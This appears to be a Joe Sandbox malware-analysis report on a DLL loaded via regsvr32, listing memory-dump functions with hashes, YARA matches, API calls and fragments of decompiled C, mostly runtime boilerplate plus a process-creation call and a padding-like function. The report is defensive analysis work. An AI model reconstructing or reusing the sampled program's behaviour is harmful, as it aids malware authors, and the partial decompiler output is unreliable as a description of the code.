Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: AccessAllocateFindMemoryResourceResource_Virtual
String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
API String ID: 2485490239-3005932707
Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00

Uniqueness

Uniqueness Score: -1.00%

Function 01287D6C Relevance: 7.7, Strings: 6, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)s, xrefs: 01287FA2
GX, xrefs: 01287D80
)y_, xrefs: 01287F29
3`d!, xrefs: 01287DD8
lo, xrefs: 01287D79
=, xrefs: 01287D8E

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )s$)y_$3`d!$GX$lo$=
API String ID: 0-308291206
Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
Instruction ID: a896924ab77a47fd8084918f7514f0bfd82ed2d98921cfba961244c696f90017
Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
Instruction Fuzzy Hash: E2914B7151074A8BDF48DF28C88A5DE3FB0FB68358F65422CEC4AA6290D778D595CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0129A000 Relevance: 7.7, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

KT, xrefs: 0129A0FA
;, xrefs: 0129A11E
F8, xrefs: 0129A125
Z, xrefs: 0129A0BB
/Q, xrefs: 0129A056
F, xrefs: 0129A03A

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /Q$;$F8$KT$F$Z
API String ID: 0-1951868783
Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
Instruction ID: 8ff805b9459f1033f095b635c594dc186e7a7b422f164bb37c496f4cdc0814ad
Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
Instruction Fuzzy Hash: EE6125B0E1470A8FDF48CFA8D88A4DEBBB1FB58314F10821DE846A7290D7749995CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t15;
				long long _t19;
				long long _t20;

				_a24 = _t20;
				_a16 = _t15;
				_a8 = _t19;
				_v56 = _a16;
				if (_v56 == 1) goto 0x80010ae6;
				goto 0x80010bf4;
				 *0x80022ca0 = _a8;
				_v52 = 0x904;
				_v48 = 0xf9e;
				_v40 = 0;
				_v32 = 0;
				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
				ExitProcess(??);
			}

0x180010ac0
0x180010ac5
0x180010ac9
0x180010ad6
0x180010adf
0x180010ae1
0x180010aeb
0x180010af2
0x180010afa
0x180010b02
0x180010b0b
0x180010b1b
0x180010b22

APIs

ExitProcess.KERNEL32 ref: 0000000180010B22

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0128CC14 Relevance: 4.1, Strings: 3, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0c, xrefs: 0128CEBC
\, xrefs: 0128D130
c2&, xrefs: 0128CD1F

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0c$\$c2&
API String ID: 0-1001447681
Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
Instruction ID: 63f8f52e1455b212f901cd626997d55a3015be18e75bc12a3f23c26d79516101
Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
Instruction Fuzzy Hash: 6102F8711093C88BEBBEDF64C8896DE7BADFB44708F10511DEA0A9E298DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01288BC8 Relevance: 4.0, Strings: 3, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

N5, xrefs: 01288C11
M, xrefs: 01288F2D
.f, xrefs: 01288E08

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .f$M$N5
API String ID: 0-1477915503
Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
Instruction ID: f18749199f800c78c4a288fbfaf77da99cf51f6952859b5403f533aa3e0b3134
Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
Instruction Fuzzy Hash: D6A191701197449FD7A8DF28C8C999EBBF0FB94304F906A1DF9869B2A0CB74D944CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01298FC8 Relevance: 1.5, Strings: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A]jN, xrefs: 01299216

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: A]jN
API String ID: 0-1761522205
Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
Instruction ID: f3c319e190b2e4ed7758fd692ef5fa0ad849e42222c8a631f7b30260335a700a
Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
Instruction Fuzzy Hash: A9D1E4B1D0060A8FDF48DFA8C48A4AEBBB1FB58304F50422DD516BB290D7786A46CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0128263C Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

C, xrefs: 01282836

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: C
API String ID: 0-3705061908
Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
Instruction ID: 29499a1dfa99a7f06ab55082d6ad35e3796ccd18608a76ba4a9331410bf93866
Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
Instruction Fuzzy Hash: 7361C07151C7848BD768DF28C18941FBBF1FBD6748F000A1DF69A862A0D7B6E958CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0000000118000147C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x800014bd;
				if (_t5 == 0) goto 0x800014b1;
				if (_t5 == 0) goto 0x800014a4;
				if (__edx == 1) goto 0x8000149d;
				return 1;
			}

0x180001480
0x180001482
0x180001487
0x18000148c
0x180001491
0x18000149c

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000001800014A4
__scrt_acquire_startup_lock.LIBCMT ref: 00000001800014F6
_RTC_Initialize.LIBCMT ref: 0000000180001524
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000000018000154A
__scrt_release_startup_lock.LIBCMT ref: 0000000180001575

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007F30 Relevance: 9.1, APIs: 6, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,0000E153C63EA8E4,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
FlsSetValue.KERNEL32(?,?,0000E153C63EA8E4,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
FlsSetValue.KERNEL32(?,?,0000E153C63EA8E4,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
FlsSetValue.KERNEL32(?,?,0000E153C63EA8E4,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
FlsSetValue.KERNEL32(?,?,0000E153C63EA8E4,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
SetLastError.KERNEL32(?,?,0000E153C63EA8E4,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A234 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E0000000118000A234(void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
				void* _t25;
				signed long long _t45;
				signed long long _t47;
				long long _t62;
				signed long long _t63;
				signed long long _t70;
				void* _t71;
				void* _t75;
				WCHAR* _t76;

				_t45 = _t70;
				 *((long long*)(_t45 + 8)) = __rbx;
				 *((long long*)(_t45 + 0x10)) = _t62;
				 *((long long*)(_t45 + 0x18)) = __rsi;
				 *((long long*)(_t45 + 0x20)) = __rdi;
				_t71 = _t70 - 0x40; // executed
				GetEnvironmentStringsW(); // executed
				if (_t45 != 0) goto 0x8000a264;
				goto 0x8000a327;
				_t63 = _t45;
				if ( *_t45 == 0) goto 0x8000a289;
				_t47 = (_t45 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t63 + _t47 * 2)) != 0) goto 0x8000a270;
				if ( *((intOrPtr*)(_t63 + _t47 * 2 + 2)) != 0) goto 0x8000a26c;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				r9d = __ebp;
				 *((intOrPtr*)(_t71 + 0x28)) = 0;
				 *(_t71 + 0x20) = __rsi;
				E0000000118000A154();
				if (0 != 0) goto 0x8000a2c7;
				FreeEnvironmentStringsW(_t76);
				goto 0x8000a25d;
				E0000000118000B4C4(_t47, 0, _t75);
				_t57 = _t47;
				if (_t47 != 0) goto 0x8000a2e0;
				_t25 = E0000000118000878C(_t47, 0);
				goto 0x8000a2bc;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				r9d = __ebp;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				 *((intOrPtr*)(_t71 + 0x28)) = r14d;
				 *(_t71 + 0x20) = _t47;
				E0000000118000A154();
				if (_t25 != 0) goto 0x8000a311;
				E0000000118000878C(_t47, _t47);
				goto 0x8000a31b;
				E0000000118000878C(_t47, _t57);
				return FreeEnvironmentStringsW(??);
			}

0x18000a234
0x18000a237
0x18000a23b
0x18000a23f
0x18000a243
0x18000a249
0x18000a24d
0x18000a25b
0x18000a25f
0x18000a264
0x18000a26a
0x18000a270
0x18000a278
0x18000a287
0x18000a289
0x18000a291
0x18000a2a0
0x18000a2a3
0x18000a2a9
0x18000a2b0
0x18000a2ba
0x18000a2bf
0x18000a2c5
0x18000a2ca
0x18000a2cf
0x18000a2d5
0x18000a2d9
0x18000a2de
0x18000a2e0
0x18000a2e5
0x18000a2e8
0x18000a2f0
0x18000a2f9
0x18000a2fe
0x18000a305
0x18000a30a
0x18000a30f
0x18000a313
0x18000a341

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A24D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A2BF

Part of subcall function 000000018000B4C4: HeapAlloc.KERNEL32(?,?,?,000000018000D071,?,?,00000000,000000018000A3A3,?,?,?,00000001800068CF,?,?,?,00000001800067C5), ref: 000000018000B502

FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A31E

Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
String ID:
API String ID: 3331406755-0
Opcode ID: 825ce012b9cb48ab94c3413abdd1171c1895b64bc4b61d191bc328906b2b8bd4
Instruction ID: 864329f4ba152f277f2adf48c891db3446df78698e664f4bc60f625a72c2a341
Opcode Fuzzy Hash: 825ce012b9cb48ab94c3413abdd1171c1895b64bc4b61d191bc328906b2b8bd4
Instruction Fuzzy Hash: 64318631608B5881FBA6DF2568403DA7794B78DFD4F48C229FA9A43BD5DF38C6498700

Uniqueness

Uniqueness Score: -1.00%

Function 01293988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 01293AF8

Strings

li, xrefs: 01293A44

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: li
API String ID: 963392458-3170889640
Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
Instruction ID: 8741ed6f870cf851f52a219713cf0914ee7ec03e38d915a7b0a753054d26573e
Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
Instruction Fuzzy Hash: 1C41E77091C7848FDB64DF18D0C979AB7E0FB98315F10495DE488C7295CB789884CB86

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D26C Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
				E000000011800086F4(__ecx - 0x2000, __rax);
				 *__rax = 9;
				E000000011800085B8();
				return 9;
			}

0x18000d26c
0x18000d271
0x18000d276
0x18000d289
0x18000d28b
0x18000d295
0x18000d297
0x18000d2b3

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018000D297

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x80008733;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x80008776;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8000875a;
				if (E0000000118000C08C() == 0) goto 0x80008776;
				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x80008745;
				goto 0x80008783;
				E000000011800086F4(_t22, _t22);
				 *_t22 = 0xc;
				return 0;
			}

0x180008714
0x180008723
0x180008727
0x180008727
0x180008731
0x18000873f
0x180008743
0x18000874c
0x180008758
0x180008769
0x180008772
0x180008774
0x180008776
0x18000877b
0x180008788

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000E153C63EA8E4,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001268 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00000001180001268(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;

				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
				if (E00000001180002A08() != 0) goto 0x80001297;
				goto 0x800012ab; // executed
				E00000001180006CDC(_t17); // executed
				if (0 != 0) goto 0x800012a9;
				E00000001180002A58(0);
				goto 0x80001293;
				return 1;
			}

0x18000127c
0x18000127f
0x180001285
0x180001291
0x180001295
0x180001297
0x18000129e
0x1800012a2
0x1800012a7
0x1800012b0

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A

Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
String ID:
API String ID: 108617051-0
Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 0000000180010A93

Part of subcall function 0000000180014C90: LoadStringW.USER32 ref: 0000000180014CBF
Part of subcall function 0000000180014C90: LoadStringW.USER32 ref: 0000000180014CDC

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: LoadString$ExitProcess
String ID:
API String ID: 80118013-0
Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180014555 Relevance: 216.5, APIs: 144, Instructions: 493COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 000000018001455C
GetLastError.KERNEL32 ref: 0000000180014566
ShowWindow.USER32 ref: 0000000180014570
GetLastError.KERNEL32 ref: 000000018001457A
ShowWindow.USER32 ref: 0000000180014584
GetLastError.KERNEL32 ref: 000000018001458E
ShowWindow.USER32 ref: 0000000180014598
GetLastError.KERNEL32 ref: 00000001800145A2
ShowWindow.USER32 ref: 00000001800145AC
GetLastError.KERNEL32 ref: 00000001800145B6
ShowWindow.USER32 ref: 00000001800145C0
GetLastError.KERNEL32 ref: 00000001800145CA
ShowWindow.USER32 ref: 00000001800145D4
GetLastError.KERNEL32 ref: 00000001800145DE
ShowWindow.USER32 ref: 00000001800145E8
GetLastError.KERNEL32 ref: 00000001800145F2
ShowWindow.USER32 ref: 00000001800145FC
GetLastError.KERNEL32 ref: 0000000180014606
ShowWindow.USER32 ref: 0000000180014610
GetLastError.KERNEL32 ref: 000000018001461A
ShowWindow.USER32 ref: 0000000180014624
GetLastError.KERNEL32 ref: 000000018001462E
ShowWindow.USER32 ref: 0000000180014638
GetLastError.KERNEL32 ref: 0000000180014642
ShowWindow.USER32 ref: 000000018001464C
GetLastError.KERNEL32 ref: 0000000180014656
ShowWindow.USER32 ref: 0000000180014660
GetLastError.KERNEL32 ref: 000000018001466A
ShowWindow.USER32 ref: 0000000180014674
GetLastError.KERNEL32 ref: 000000018001467E
ShowWindow.USER32 ref: 0000000180014688
GetLastError.KERNEL32 ref: 0000000180014692
ShowWindow.USER32 ref: 000000018001469C
